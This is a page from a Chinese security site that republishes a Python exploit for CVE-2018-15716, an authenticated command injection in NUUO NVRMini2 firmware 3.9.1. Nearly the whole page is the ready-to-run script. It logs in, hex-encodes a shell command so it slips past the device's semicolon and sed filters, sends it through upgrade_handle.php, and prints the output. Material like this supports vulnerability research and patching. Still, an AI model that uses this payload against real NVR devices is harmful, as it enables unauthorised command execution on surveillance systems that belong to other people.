首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NUUO NVRMini2 3.9.1 - Authenticated Command Injection
来源:vfocus.net 作者:ArtemMetla 发布时间:2018-12-05  
# Exploit Title: NUUO NVRMini2 Authenticated Command Injection
# Date: December 3, 2018
# Exploit Author: Artem Metla
# Vendor Homepage: https://www.nuuo.com/ProductNode.php?node=2#
# Version: 3.9.1
# Tested on: NUUO NVRMini2 with firmware 3.9.1
# CVE : CVE-2018-15716
# Advisory: https://www.tenable.com/security/research/tra-2018-41
 
import argparse
import requests
import urllib.parse
import binascii
import http.cookiejar as cookielib
import re
 
 
def run(target, username, password, command):
    """ Authenticate us and execute exploitation """
    # Step 1. Authentication
    payload = {'language':'en', 'user':username, 'pass':password,
'submit':'Login'}
    r = requests.post(urllib.parse.urljoin(target, 'login.php'),
data=payload, verify=False, allow_redirects=False)
 
    jar = r.cookies
 
    # Step 2. Prepare a payload
 
    # We're bypassing 2 filters:
    # 1) Instead of using ";" we can try || or &&, to bypass:
    #    if(strpos($uploaddir, ';') !== false)
    #    {
    #      die('[1]Not a valid path.');
    #    }
 
    # 2) To bypass this:
    #    $cmd = "sed -i 's/".str_replace('/', '\/',
$current_dir)."/".str_replace('/', '\/', $tmp_upload_dir)."/g'
".PHP_CINF_PATH;
    #    we have to HEX encode a payload
    #
    #    Simple example of payload that we're trying to achieve: '||ls`echo
-e "\\x20\\x2f"`||' to execue: ls /
 
    # 3) Multiple parameters commands are not supported yet, but the same
techique could be used for them
 
    # Primitive Bash command parser
    splitted_command = [command]
    for i in range(0, len(command)-1):
        if command[i] == " " and command[i+1] != "-":
            splitted_command = [command[:i], command[i+1:]]
            break
 
    # Encoding a payload
    if len(splitted_command) == 2:
        payload = "".join('\\\\x%s' %
binascii.hexlify(char.encode('ascii')).decode("utf-8") for char in
splitted_command[1])
        exploit = '\'||%s `echo -e "%s"`||\'' % (splitted_command[0],
payload)
        print("Exploit: %s" % exploit)
    else:
        exploit = '\'||%s||\'' % (splitted_command[0])
        print("Exploit: %s" % exploit)
 
    # Step 3. Send a payload
    payload = {'cmd':'writeuploaddir', 'uploaddir':exploit}
    r = requests.get(urllib.parse.urljoin(target, 'upgrade_handle.php'),
params=payload, verify=False, cookies=jar)
 
    # Step 4. Output processing to grab only needed output
    res = re.search('upload_tmp_dir=([^<>]*)<br />', str(r.content))
    if res:
        print(res.group(1).replace('\\n', '\n'))
 
 
def main():
    """ Parse command line arguments and start exploit """
    parser = argparse.ArgumentParser(
            add_help=False,
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="Examples: %(prog)s -t http://192.168.0.1/ -u username
-p password -c whoami")
 
    # Adds arguments to help menu
    parser.add_argument("-h", action="help", help="Print this help message
then exit")
    parser.add_argument("-t", dest="target", required="yes", help="Target
URL address like: https://localhost:443/")
    parser.add_argument("-u", dest="username", required="yes",
help="Username to authenticate")
    parser.add_argument("-p", dest="password", required="yes",
help="Password to authenticate")
    parser.add_argument("-c", dest="command", required="yes", help="Shell
command to execute")
 
    # Assigns the arguments to various variables
    args = parser.parse_args()
 
    run(args.target, args.username, args.password, args.command)
 
 
#
# Main
#
 
if __name__ == "__main__":
    main()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenSSH < 7.7 - User Enumerati
·HasanMWB 1.0 SQL Injection
·Xorg X11 Server (AIX) - Local
·Textpad 8.1.2 - Denial Of Serv
·Microsoft Lync for Mac 2011 -
·i-doit CMDB 1.11.2 - Remote Co
·HP Intelligent Management Java
·FutureNet NXR-G240 Series Shel
·Emacs movemail Privilege Escal
·MiniShare 1.4.1 HEAD / POST Bu
·NEC Univerge Sv9100 WebPro 6.0
·XNU POSIX Shared Memory Mappin
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved